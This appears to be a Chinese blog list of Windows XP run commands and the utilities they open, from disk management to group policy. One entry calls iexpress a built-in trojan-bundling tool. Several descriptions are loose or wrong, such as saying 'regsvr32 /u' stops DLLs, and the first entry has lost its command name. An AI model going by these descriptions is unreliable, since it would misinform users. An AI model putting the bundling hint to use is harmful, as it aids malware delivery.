設備管理器dfrg.msc-------磁盤碎片整理程序diskmgmt.msc---磁盤管理實用程序dcomcnfg-------打開系統組件服務ddeshare-------打開DDE共享設置dvdplay--------DVD播放器net stop messenger-----停止信使服務net start messenger----開始信使服務notepad--------打開記事本nslookup-------網絡管理的工具向導ntbackup-------系統備份和還原narrator-------屏幕"講述人"ntmsmgr.msc----移動存儲管理器ntmsoprq.msc---移動存儲管理員操作請求netstat -an----(TC)命令檢查接口syncapp--------創建一個公文包sysedit--------系統配置編輯器sigverif-------文件簽名驗証程序sndrec32-------錄音机shrpubw--------創建共享文件夾secpol.msc-----本地安全策略syskey---------系統加密,一旦加密就不能解開,保護windows xp系統的雙重密碼services.msc---本地服務設置Sndvol32-------音量控制程序sfc.exe--------系統文件檢查器sfc /scannow---windows文件保護tsshutdn-------60秒倒計時關机命令tourstart------xp簡介(安裝完成后出現的漫游xp程序)taskmgr--------任務管理器eventvwr-------事件查看器eudcedit-------造字程序explorer-------打開資源管理器packager-------對象包裝程序perfmon.msc----計算机性能監測程序progman--------程序管理器regedit.exe----注冊表rsop.msc-------組策略結果集regedt32-------注冊表編輯器rononce -p ----15秒關机regsvr32 /u *.dll----停止dll文件運行regsvr32 /u zipfldr.dll------取消ZIP支持cmd.exe--------CMD命令提示符chkdsk.exe-----Chkdsk磁盤檢查certmgr.msc----証書管理實用程序calc-----------啟動計算器charmap--------啟動字符映射表cliconfg-------SQL SERVER 客戶端網絡實用程序Clipbrd--------剪貼板查看器conf-----------啟動netmeetingcompmgmt.msc---計算机管理cleanmgr-------**整理ciadv.msc------索引服務程序osk------------打開屏幕鍵盤odbcad32-------ODBC數据源管理器oobe/msoobe /a----檢查XP是否激活lusrmgr.msc----本机用戶和組logoff---------注銷命令iexpress-------木馬捆綁工具,系統自帶Nslookup-------IP地址偵測器fsmgmt.msc-----共享文件夾管理器utilman--------輔助工具管理器gpedit.msc-----組策略
張貼留言